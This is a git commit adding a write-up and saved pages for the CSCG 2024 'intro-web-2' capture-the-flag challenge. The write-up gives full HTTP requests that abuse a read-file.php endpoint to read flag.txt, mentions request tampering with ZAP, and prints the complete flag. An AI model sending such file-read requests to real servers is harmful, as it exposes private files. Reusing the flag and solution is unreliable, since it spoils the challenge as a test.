solved intro-web-2
This commit is contained in:
Binary file not shown.
Binary file not shown.
Binary file not shown.
File diff suppressed because it is too large
Load Diff
@@ -1,5 +1,5 @@
|
||||
#HSQL Database Engine 2.7.2
|
||||
#Sat Mar 02 03:32:43 CET 2024
|
||||
tx_timestamp=543
|
||||
modified=yes
|
||||
#Sat Mar 02 04:14:43 CET 2024
|
||||
tx_timestamp=61202
|
||||
modified=no
|
||||
version=2.7.2
|
||||
|
||||
File diff suppressed because it is too large
Load Diff
19
cscg24/web/intro_web_2/leaked_sites/burn_after_reading.html
Normal file
19
cscg24/web/intro_web_2/leaked_sites/burn_after_reading.html
Normal file
@@ -0,0 +1,19 @@
|
||||
<html>
|
||||
<head>
|
||||
<title>Intro to Web 2</title>
|
||||
<meta charset="UTF-8">
|
||||
<link rel="stylesheet" type="text/css" href="style.css" />
|
||||
</head>
|
||||
<body>
|
||||
<h1>Burn After Reading</h1>
|
||||
This page automatically retrieves confidential information.
|
||||
To protect against unauthorized use, the backend server will irreversibly nuke all of our data in
|
||||
case this page is accessed by someone that failed to pass our
|
||||
<em>Military-Grade Security Gate™</em>.
|
||||
<h3>Status of flag document:
|
||||
<span style="color:green">INTACT</span></h3>
|
||||
<hr>
|
||||
<pre>
|
||||
Flag part 4/4: W4at6R2B}</pre>
|
||||
</body>
|
||||
</html>
|
||||
16
cscg24/web/intro_web_2/leaked_sites/statistics_console.html
Normal file
16
cscg24/web/intro_web_2/leaked_sites/statistics_console.html
Normal file
@@ -0,0 +1,16 @@
|
||||
<html>
|
||||
<head>
|
||||
<title>Intro to Web 2</title>
|
||||
<meta charset="UTF-8">
|
||||
<link rel="stylesheet" type="text/css" href="style.css" />
|
||||
</head>
|
||||
<body>
|
||||
<h1>Statistics Console (POST version)</h1>
|
||||
<h3>File Name:
|
||||
<span style="font-family: 'Courier New', monospace;">flag.txt</span></h3>
|
||||
<hr>
|
||||
<pre>
|
||||
Flag part 2/4: UaT0BVvk</pre>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
@@ -0,0 +1,16 @@
|
||||
<html>
|
||||
<head>
|
||||
<title>Intro to Web 2</title>
|
||||
<meta charset="UTF-8">
|
||||
<link rel="stylesheet" type="text/css" href="style.css" />
|
||||
</head>
|
||||
<body>
|
||||
<h1>Statistics Console (GET version)</h1>
|
||||
<h3>File Name:
|
||||
<span style="font-family: 'Courier New', monospace;">flag.txt</span></h3>
|
||||
<hr>
|
||||
<pre>
|
||||
Flag part 3/4: Q9Z39J9A</pre>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
@@ -1,2 +1,57 @@
|
||||
### 1.Part
|
||||
We can spoof our OS with the help of ZAP and get the site [train.html](leaked_sites/train.html)
|
||||
### 2. Part
|
||||
There is an unsecure statistics service which shows you the content of every file you specify. We can use this to get the content of flag.txt.
|
||||
Sending the following request:
|
||||
|
||||
```http
|
||||
POST https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/read-file.php HTTP/1.1
|
||||
host: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
content-length: 17
|
||||
Origin: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
|
||||
Connection: keep-alive
|
||||
Referer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Sec-Fetch-Dest: document
|
||||
Sec-Fetch-Mode: navigate
|
||||
Sec-Fetch-Site: same-origin
|
||||
Sec-Fetch-User: ?1
|
||||
|
||||
filename=flag.txt
|
||||
```
|
||||
|
||||
Yields the page [statistics_console.html](leaked_sites/statistics_console.html)
|
||||
|
||||
### 3. Part
|
||||
|
||||
A similar bug can be used with a GET request to get the content of the flag.txt file.
|
||||
This time we use a faulty php file called read-file.php
|
||||
|
||||
```http
|
||||
GET https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/read-file.php?filename=flag.txt HTTP/1.1
|
||||
host: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Connection: keep-alive
|
||||
Referer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Sec-Fetch-Dest: document
|
||||
Sec-Fetch-Mode: navigate
|
||||
Sec-Fetch-Site: same-origin
|
||||
Sec-Fetch-User: ?1
|
||||
content-length: 0
|
||||
```
|
||||
|
||||
Returns the page [statistics_console_get.html](leaked_sites/statistics_console_get.html)
|
||||
|
||||
### 4.Part
|
||||
We now have to intercept a request made and change the authority information.
|
||||
When we do this we get the fourth part of the flag.
|
||||
|
||||
### flag
|
||||
CSCG{l9jj550KUaT0BVvkQ9Z39J9AW4at6R2B}
|
||||
|
||||
Reference in New Issue
Block a user